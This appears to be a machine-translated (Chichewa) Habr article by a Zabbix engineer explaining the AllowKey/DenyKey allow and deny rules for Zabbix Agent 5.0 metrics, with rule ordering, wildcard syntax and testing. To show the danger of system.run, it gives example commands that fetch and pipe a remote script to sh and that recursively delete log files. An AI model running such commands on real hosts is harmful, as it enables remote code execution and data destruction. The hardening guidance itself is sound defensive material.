🥇Kuthandizira pamndandanda wakuda ndi woyera wamametric am'mbali mwa othandizira mu Zabbix 5.0

Thandizo la mndandanda ndi whitelist pamametric a mbali ya wothandizira

Tikhon Uskov, Integration Engineer, Zabbix

Zokhudza chitetezo cha data

Zabbix 5.0 ili ndi gawo latsopano lomwe limakupatsani mwayi wowongolera chitetezo pamakina ogwiritsira ntchito Zabbix Agent ndikulowetsa parameter yakale. YambitsaniRemoteCommands.

Kupititsa patsogolo chitetezo cha machitidwe opangidwa ndi wothandizira kumachokera ku mfundo yakuti wothandizira amatha kuchita zinthu zambiri zomwe zingakhale zoopsa.

Wothandizira atha kusonkhanitsa pafupifupi zidziwitso zilizonse, kuphatikiza zinsinsi kapena zomwe zingakhale zowopsa, kuchokera pamafayilo osinthira, mafayilo alogi, mafayilo achinsinsi, kapena mafayilo ena aliwonse.

Mwachitsanzo, pogwiritsa ntchito zabbix_get mutha kupeza mndandanda wa ogwiritsa ntchito, zolemba zawo zakunyumba, mafayilo achinsinsi, ndi zina zambiri.

Kupeza deta pogwiritsa ntchito zabbix_get

Zindikirani. Deta ikhoza kubwezedwa pokhapokha ngati wothandizira awerenga zilolezo pa fayilo yofananira. Koma, mwachitsanzo, fayilo / etc/passwd/ zowerengedwa ndi ogwiritsa ntchito onse.

Wothandizira athanso kupereka malamulo omwe angakhale oopsa. Mwachitsanzo, key *system.run[]** amakulolani kuti mupereke malamulo akutali pa node za netiweki, kuphatikiza kulemba zolemba kuchokera pa tsamba la Zabbix lomwe limaperekanso malamulo kumbali ya wothandizira.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

Pa Linux, wothandizirayo amayenda mwachisawawa popanda mwayi wa mizu, pomwe pa Windows imagwira ntchito ngati System ndipo imakhala ndi mwayi wofikira pamafayilo. Chifukwa chake, ngati palibe kusintha kwa magawo a Zabbix Agent pambuyo pa kukhazikitsa, wothandizirayo ali ndi mwayi wolembetsa, mafayilo amafayilo ndipo amatha kufunsa mafunso a WMI.

M'matembenuzidwe akale parameter EnableRemoteCommands=0 amaloledwa kungoletsa ma metric ndi kiyi *system.run[]** ndikuyendetsa zolembedwa kuchokera pa intaneti, koma panalibe njira yoletsa kulowa kwa mafayilo amodzi, kulola kapena kuletsa makiyi omwe adayikidwa ndi wothandizira, kapena kuchepetsa kugwiritsa ntchito magawo amodzi.

Kugwiritsa ntchito gawo la EnableRemoteCommand m'mitundu yakale ya Zabbix

AllowKey/DenyKey

Zabbix 5.0 imathandizira kuteteza ku mwayi wosaloleka woterewu popereka ozunguza ndi mindandanda yakuda kuti alole ndi kukana ma metrics kumbali ya wothandizira.

Mu Zabbix 5.0 makiyi onse, kuphatikiza *system.run[]** yayatsidwa, ndipo zosankha ziwiri zatsopano zosinthira wothandizila zawonjezedwa:

AllowKey= - macheke ololedwa;

DenyKey= - macheke oletsedwa;

pali dzina lofunikira lomwe lili ndi magawo omwe amagwiritsa ntchito metacharacters (*).

Makiyi a AllowKey ndi DenyKey amakupatsani mwayi wololeza kapena kukana ma metric omwe ali pamtundu wina wake. Mosiyana ndi magawo ena osinthira, kuchuluka kwa magawo a AllowKey/DenyKey sikuli malire. Izi zimakuthandizani kuti mufotokoze momveka bwino zomwe wothandizila angachite mu dongosolo popanga mtengo wa macheke - makiyi otheka, pomwe dongosolo lomwe amalembera limagwira ntchito yofunika kwambiri.

Kutsatizana kwa malamulo

Malamulo amafufuzidwa mu dongosolo lomwe alowetsedwa mu fayilo yokonzekera. Mfungulo imafufuzidwa molingana ndi malamulo musanayambe machesi oyambirira, ndipo mwamsanga pamene fungulo la chinthu cha deta likufanana ndi chitsanzo, limaloledwa kapena kukanidwa. Pambuyo pa izi, kuyang'ana malamulo kuyimitsidwa ndipo makiyi otsala amanyalanyazidwa.

Chifukwa chake, ngati chinthu chikugwirizana ndi lamulo lololeza komanso kukana, zotsatira zake zimatengera lamulo lomwe limakhala loyamba mufayilo yosinthira.

2 malamulo osiyana ndi chitsanzo chomwecho ndi kiyi vfs.file.size[/tmp/file]

Dongosolo la kugwiritsa ntchito makiyi a AllowKey/DenyKey:

malamulo enieni,
malamulo onse,
lamulo loletsa.

Mwachitsanzo, ngati mukufuna kupeza mafayilo mufoda inayake, choyamba muyenera kulola kuwafikira, ndikukana china chilichonse chomwe sichikugwera muzovomerezeka. Ngati lamulo lokana likugwiritsidwa ntchito poyamba, mwayi wopita kufoda udzakanidwa.

Kutsatira kolondola

Ngati mukufuna kulola zida ziwiri kuti ziziyenda kudzera *system.run[]**, ndipo lamulo lokana lidzafotokozedwa poyamba, zothandizira sizidzayambitsidwa, chifukwa chitsanzo choyamba chidzafanana nthawi zonse ndi fungulo lililonse, ndipo malamulo otsatirawa adzanyalanyazidwa.

Mayendedwe olakwika

Zitsanzo

Malamulo oyambirira

Chitsanzo ndi chisonyezero chokhala ndi zipolopolo. Metacharacter (*) ikufanana ndi nambala iliyonse ya zilembo zomwe zili pamalo enaake. Ma metacharacter atha kugwiritsidwa ntchito mu dzina lofunikira komanso pazigawo. Mwachitsanzo, mutha kufotokozera mosamalitsa gawo loyamba ndi mawu, ndipo tchulani yotsatirayo ngati wildcard.

Ma parameters ayenera kutsekedwa m'mabulaketi apakati [].

system.run[* - zolakwika
vfs.file*.txt] - zolakwika
vfs.file.*[*] - chabwino

Zitsanzo za kugwiritsa ntchito wildcard.

Mu dzina lofunikira komanso mu parameter. Pankhaniyi, fungulo silikugwirizana ndi fungulo lofanana lomwe liribe parameter, chifukwa mu chitsanzo tidawonetsa kuti tikufuna kulandira mapeto ena a dzina lofunikira ndi magawo ena.
Ngati mawonekedwewo sagwiritsa ntchito masikweya apakati, mawonekedwewo amalola makiyi onse omwe alibe magawo ndipo amakana makiyi onse omwe ali ndi magawo omwe atchulidwa.
Ngati fungulo lalembedwa mokwanira ndipo magawowo atchulidwa ngati wildcard, idzafanana ndi fungulo lofanana ndi magawo aliwonse ndipo silingafanane ndi fungulo lopanda masikweya, mwachitsanzo, lidzaloledwa kapena kukanidwa.

Malamulo odzaza magawo.

Ngati fungulo lomwe lili ndi magawo likuyenera kugwiritsidwa ntchito, magawowo ayenera kufotokozedwa mufayilo yosinthira. Ma parameters ayenera kutchulidwa ngati metacharacter. Ndikofunikira kukana mosamalitsa mwayi wopeza fayilo iliyonse ndikuganizira zomwe metric angapereke pansi pa masipelo osiyanasiyana - opanda magawo komanso opanda magawo.

Mawonekedwe a makiyi olembera okhala ndi magawo

Ngati fungulo latchulidwa ndi magawo, koma magawowo ndi osankha ndipo amatchulidwa ngati metacharacter, fungulo lopanda magawo lidzathetsedwa. Mwachitsanzo, ngati mukufuna kuletsa kulandira zambiri za katundu pa CPU ndi kufotokoza kuti system.cpu.load[*] kiyi ayenera kuzimitsidwa, musaiwale kuti kiyi popanda magawo adzabweza avareji mtengo.

Malamulo odzaza magawo

Zolemba

kusintha

Malamulo ena sangasinthidwe ndi wogwiritsa ntchito, mwachitsanzo, malamulo otulukira kapena malamulo olembera okha wothandizira. Malamulo a AllowKey/DenyKey samakhudza magawo awa:
-HostnameItem
- HostMetadataItem
- HostInterfaceItem

Zindikirani. Ngati woyang'anira azimitsa kiyi, akafunsidwa, Zabbix sapereka zambiri za chifukwa chake metric kapena kiyi ikugwera mugulu la '.OSATHANDIZA'. Zambiri zokhudzana ndi zoletsa potsatira malamulo akutali sizimawonetsedwanso m'mafayilo alogi ya othandizira. Izi ndi zifukwa zachitetezo, koma zitha kusokoneza kukonza ngati ma metric agwera m'gulu losathandizidwa pazifukwa zina..

Simuyenera kudalira dongosolo lililonse lolumikizira mafayilo akunja (mwachitsanzo, motsatira zilembo).

Command Line Utilities

Pambuyo kukhazikitsa malamulo, muyenera kuonetsetsa kuti zonse zakonzedwa bwino.

Mukhoza kugwiritsa ntchito imodzi mwa njira zitatu:

Onjezani metric ku Zabbix.
Yesani ndi zabbix_agentd. Zabbix wothandizira ndi mwayi -sindikiza (-p) imawonetsa makiyi onse (omwe amaloledwa mwachisawawa) kupatula omwe saloledwa ndi kasinthidwe. Ndipo ndi mwayi -kuyesa (-t) chifukwa kiyi yoletsedwa idzabwerera 'Kiyi ya chinthu chosagwirizana'.
Yesani ndi zabbix_get. Zothandiza zabbix_get ndi mwayi -k adzabwerera 'ZBX_NOTSUPPORTED: Metric yosadziwika'.

Lolani kapena kukana

Mutha kukana mwayi wopeza fayilo ndikutsimikizira, mwachitsanzo, pogwiritsa ntchito zofunikira zabbix_getkuti mwayi wopeza fayilo waletsedwa.

Zindikirani. Quotes mu parameter imanyalanyazidwa.

Pankhaniyi, mwayi wopeza fayilo yotere ukhoza kuloledwa kudzera m'njira ina. Mwachitsanzo, ngati symlink imatsogolera ku izo.

Ndikoyenera kuyang'ana njira zosiyanasiyana zogwiritsira ntchito malamulo omwe atchulidwa, komanso kuganiziranso mwayi wodutsa zoletsedwazo.

Mafunso ndi Mayankho

funso. Nchifukwa chiyani dongosolo lovuta kwambiri lokhala ndi chinenero chake linasankhidwa kuti lifotokoze malamulo, zilolezo ndi zoletsa? Chifukwa chiyani sikunali kotheka kugwiritsa ntchito, mwachitsanzo, mawu omwe Zabbix amagwiritsa ntchito?

Yankhani. Ili ndi vuto la magwiridwe antchito a regex popeza nthawi zambiri pamakhala wothandizira m'modzi yekha ndipo amayang'ana ma metric ambiri. Regex ndi ntchito yolemetsa kwambiri ndipo sitingathe kuyang'ana masauzande ambiri motere. Wildcards - njira yonse, yogwiritsidwa ntchito kwambiri komanso yosavuta.

funso. Kodi Phatikizani mafayilo amaphatikizidwa motsatira zilembo?

Yankhani. Monga ndikudziwira, ndizosatheka kulosera momwe malamulo adzagwiritsire ntchito ngati mufalitsa malamulo pamafayilo osiyanasiyana. Ndikupangira kusonkhanitsa malamulo onse a AllowKey/DenyKey mu Fayilo imodzi, chifukwa amalumikizana wina ndi mnzake, kuphatikiza fayiloyi..

funso. Mu Zabbix 5.0 njira 'EnableRemoteCommands=' ikusowa pa fayilo yosinthira, ndipo AllowKey/DenyKey okha ndi omwe alipo?

Yankhani. Inde ndiko kulondola.

Zikomo chifukwa cha chidwi chanu!

Source: www.habr.com

Thandizo losankhira ndi whitelist pama metrics ammbali mwa Zabbix 5.0